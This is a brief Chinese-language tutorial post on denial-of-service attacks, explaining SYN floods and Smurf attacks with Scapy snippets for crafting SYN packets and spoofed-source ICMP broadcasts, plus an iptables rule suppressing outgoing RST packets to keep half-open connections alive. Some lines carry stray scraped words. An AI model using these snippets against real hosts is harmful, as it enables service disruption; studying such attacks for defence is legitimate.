Dos拒絕服務Syn-Flood泛洪攻擊--Smurf 攻擊(一)

Dos拒絕服務
利用程序漏洞或一對一資源耗盡的Denial of Service 拒絕服務
DDos 分佈式拒絕服務 多對一服務器

 


 

Syn-Flood泛洪攻擊tcp

發送syn包欺騙服務器創建半鏈接分佈式

攻擊代碼,利用scapyspa

Scapy
– i=IP()
– i.dst=1.1.1.1
– i.display()
– t=TCP()
– sr1(i/t,verbose=1,timeout=3)
– sr1(IP(dst=1.1.1.1)/TCP())

防火牆配置關閉本機發送rst包操作系統

RST包的做用:告訴服務器我不和你創建鏈接,計算機在接收到服務器的ack+syn包的時候,系統會自動發送RSTcode

iptables -A OUTPUT -p tcp --tcp-flags RST RST -d 1.1.1.1 -j DROP //指定IP,關閉本地發送Rst包
netstat -n | awk '/^tcp/ {++S[$NF]} END {for(a in S) print a, S[a]}' //查看本機tcp鏈接數

 

 

Smurf 攻擊
最古老的DDos攻擊技術
技術原理:利用icmp包,僞造源IP發廣播包,廣播局域網內的全部計算機回覆廣播包給僞造的IP,形成攻擊對僞造IP的效果
對如今的操做系統幾乎無效(不響應廣播包)blog

攻擊實現代碼:ip

Scapy
– i=IP()
– i.dst="1.1.1.255"
– p=ICMP()
– p.display()
– r=(i/p)
– send(IP(dst="1.1.1.255",src="1.1.1.2")/ICMP(),count=100,verbose=1)
相關文章
相關標籤/搜索